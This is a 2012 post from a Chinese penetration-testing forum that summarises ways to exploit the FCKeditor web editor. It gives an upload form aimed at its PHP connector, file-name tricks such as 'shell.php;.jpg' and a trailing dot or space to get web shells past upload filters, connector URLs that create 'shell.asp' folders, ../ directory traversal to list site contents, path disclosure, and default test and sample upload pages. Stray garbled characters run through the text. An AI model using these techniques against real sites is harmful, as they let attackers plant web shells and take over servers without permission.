中国网络渗透测试联盟

标题: FCKeditor漏洞利用总结 [打印本页]

作者: 荒村狂客    时间: 2012-9-5 20:23
标题: FCKeditor漏洞利用总结
Fckeditor漏洞利用总结

查看编辑器版本
0 a6 I2 Z  g  E1 \1 `5 D. |7 c: TFCKeditor/_whatsnew.html1 K" V% ]; W0 F, d' x8 R
—————————————————————————————————————————————————————————————

2. Version 2.2 版本
2 N. d: M5 B& J+ a3 v7 SApache+linux 环境下在上传文件后面加个.突破!测试通过。
5 ^* w9 e* z* [" ?—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。# D+ }; y$ k: H8 x
<form id="frmUpload" enctype="multipart/form-data"" [/ r6 R9 u+ p7 v
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>4 ^3 e) Z& O6 \1 U& a% E  J5 [) ~
<input type="file" name="NewFile" size="50"><br>6 ?) E/ z) U+ s5 H6 y
<input id="btnUpload" type="submit" value="Upload">
6 _" N/ U3 W  o6 A</form>
) }2 M$ O  {7 v" ~- |  i—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法0 D. z6 r9 f) l5 C0 z1 j
        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。. O' d9 ?4 B) k- L+ v  v0 N
    4.1:提交shell.php+空格绕过
4 i9 k. U- F& E5 Y不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
9 d: y- K& s, {    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。0 A- D2 ?- X4 R- z4 b* v
—————————————————————————————————————————————————————————————

5. 突破建立文件夹) L, {/ c' a* ~! x7 `/ y2 q& o8 L
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684" K2 P9 n8 s8 [
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp. R% T- J* D' L, V4 _/ `. s4 r
—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址6 N2 y' d! y8 B; G
FCKeditor/editor/filemanager/browser/default/connectors/test.html
  T2 w: `% W. L# v' mFCKeditor/editor/filemanager/upload/test.html
  u: z+ k6 U$ z2 ?( WFCKeditor/editor/filemanager/connectors/test.html, S4 o) b) R6 z5 ^# _7 g' E/ S1 r/ v
FCKeditor/editor/filemanager/connectors/uploadtest.html+ X0 P" k& N7 `6 y
—————————————————————————————————————————————————————————————  r  Q& M1 G4 @/ D: ~+ h7 A

7.常用上传地址
2 ?3 z- [( j$ g8 ^% q6 @" V! ZFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/" ?) i: G5 g4 e) e
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
6 ?0 a% c1 w# p4 L  b) j  [3 K6 _FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
2 a6 Y3 D0 y& m+ q" D6 oJSP 版:
( h* E% Y, I: O! c2 q4 QFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp0 p# J( F. g: e* p0 m& v
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文' J' |7 l. E7 z
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
  z+ ]) B* Z6 Z$ Y9 G+ m—————————————————————————————————————————————————————————————

8.其他上传地址
3 X5 }7 X- D: F  H3 p! N5 ?FCKeditor/_samples/default.html$ E3 V  ^# Y" m. i! c
FCKeditor/_samples/asp/sample01.asp
$ b, {# f' ^" _( E( PFCKeditor/_samples/asp/sample02.asp2 O. o* d* s9 T4 h' d1 O! f9 U
FCKeditor/_samples/asp/sample03.asp. ^  f% s8 f% ], v# }
FCKeditor/_samples/asp/sample04.asp
% P2 E5 y7 p# \: W一般很多站点都已删除_samples 目录,可以试试。
" d! |# \& v: B$ Q5 R7 R" [FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
0 y8 y& v/ Q  Y7 M—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址
7 {0 m2 g: i, t' Q3 a/ cVersion 2.4.1 测试通过
+ u0 ?3 x1 v' O# H  L# z: u9 l- ]- |. u修改CurrentFolder 参数使用 ../../来进入不同的目录
! e* O) G3 N, q/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
( r% m+ e8 |7 W, I% I4 Q根据返回的XML 信息可以查看网站所有的目录。( w' B& {1 h( }/ R( O1 N8 k2 M
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
! b* X2 x$ h# Z8 |9 v8 w9 U# Q/ t也可以直接浏览盘符:8 ^. Z( ]  p8 e( b: n  S) E
JSP 版本:$ o0 y/ ?) C: ]- r
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
3 S9 ~" E. f* D! [: f0 O—————————————————————————————————————————————————————————————

10.爆路径漏洞: O0 h6 O9 {3 h  ]1 K1 K3 }
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp* m$ U0 O( z- M* c- U
—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题
: T3 s  k' w2 i: E' c" t        影响版本: FCKeditor x.x <= FCKeditor v2.4.3- u; _4 [% K' x
脆弱描述:
1 G7 `. d5 E# V. pFCKeditor v2.4.3 中File 类别默认拒绝上传类型:
% Z) K4 [% O$ A: T1 Dhtml|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm1 ?. z) P6 C; Y4 P: W8 r
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
6 z6 K% }! D# d) U: a, H: I% n        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。/ R; O+ n& M% {3 s% ?( z8 ]
        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!


作者: admin    时间: 2012-9-8 22:43
[attach]41[/attach]




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2